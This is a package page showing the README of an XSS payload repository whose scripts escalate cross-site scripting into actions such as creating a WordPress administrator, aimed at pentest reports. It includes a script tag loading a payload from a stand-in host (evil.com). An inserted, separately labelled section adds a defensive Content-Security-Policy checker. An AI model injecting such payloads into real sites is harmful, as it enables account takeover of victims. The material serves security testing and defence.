github.com/hakluke/weaponised-xss-payloads

  • v0.0.0-20230424211358-3f7dc65b588a
  • Source
  • Go
Weaponised XSS Payloads

XSS payloads designed to turn alert(1) into P1.

The Blog Post

This repo was released alongside a blog post titled "How to Upgrade Your XSS Bugs from Medium to Critical": https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

What is this?

In this repository you will find a bunch of JavaScript files which can be loaded into an XSS payload in order to perform sensitive functions on popular CMS platforms in the context of the victim's browser. This can help to chain a plain old XSS bug into something more critical, like an account takeover.

This is perfect for beefing up the severity of a pentest or bug bounty report by demonstrating real security impact.

Payloads are slowly being added as I have time. There are plenty more to come. If you can help out, pull requests are welcome! If you're looking for inspiration on what to create, check the "issues" tab on this repo.

How To

The simplest way to use these payloads is to host them somewhere and load them into the src attribute of a script tag for your XSS payload like this:

<script src="http://evil.com/wordpress_create_admin_user.js"></script>

Alternatively, depending on the context and length of the payload, it can sometimes be minified, encoded and then just included directly into the request.

In order to host the JavaScript file, you may need to set the Content-Type to application/javascript. To achieve this with PHP, you can simply prepend this line to the top of any of the payloads, save it as a .php file and host it on your PHP-enabled webserver:

<?php header("Content-Type: application/javascript"); ?>
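
A defender's check for the loading method described above, as an added example that is not part of this repository: it evaluates whether a given Content-Security-Policy header would let a cross-origin script tag or an inline script run. The function names are hypothetical, and the matcher covers a simplified subset of CSP source matching (ports and paths are ignored).

```javascript
// Added example (not repository code): simplified subset of CSP3 source matching.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    // A repeated directive is ignored by browsers; the first occurrence wins.
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Source list governing <script> elements, following the fallback chain.
function scriptSources(policy) {
  for (const d of ['script-src-elem', 'script-src', 'default-src']) {
    if (policy.has(d)) return policy.get(d).map((s) => s.toLowerCase());
  }
  return null; // no directive applies, so nothing is restricted
}

// An http: source also matches the https: upgrade of the same resource.
const schemeOk = (scheme, url) => scheme === url.protocol || (scheme === 'http:' && url.protocol === 'https:');
const hostOk = (pattern, host) => (pattern.startsWith('*.') ? host.endsWith(pattern.slice(1)) : pattern === host);

// Would a <script src=scriptUrl> injected into the page at pageUrl be allowed to load?
function externalScriptAllowed(header, pageUrl, scriptUrl) {
  const sources = scriptSources(parseCsp(header));
  if (sources === null) return true;
  const page = new URL(pageUrl), script = new URL(scriptUrl);
  // With 'strict-dynamic', host and scheme allowlists are ignored; an injected tag carries no valid nonce.
  if (sources.includes("'strict-dynamic'")) return false;
  return sources.some((src) => {
    if (src === '*') return ['http:', 'https:'].includes(script.protocol);
    if (src === "'self'") return script.origin === page.origin;
    if (src.startsWith("'")) return false; // 'none', nonces, hashes, other keywords
    if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return schemeOk(src, script); // scheme-source such as https:
    const m = src.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)/); // host-source, optional scheme
    return m !== null && schemeOk(m[1] ? m[1] + ':' : page.protocol, script) && hostOk(m[2], script.hostname);
  });
}

// Would an inline <script> block run? 'unsafe-inline' is ignored once a nonce, hash or 'strict-dynamic' is present.
function inlineScriptAllowed(header) {
  const sources = scriptSources(parseCsp(header));
  if (sources === null) return true;
  const overridden = sources.some((s) => /^'(nonce-|sha(256|384|512)-|strict-dynamic')/.test(s));
  return sources.includes("'unsafe-inline'") && !overridden;
}
```

Running a site's deployed header through both functions shows which of the two delivery routes described above the policy actually closes; a policy that lists a bare `https:` scheme or `'unsafe-inline'` without a nonce closes neither.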

Credits

This article from Shift8 is what inspired me to make this repo. The JS in the article has a couple of minor typos but the concepts are spot on.

FAQs

Package last updated on 24 Apr 2023
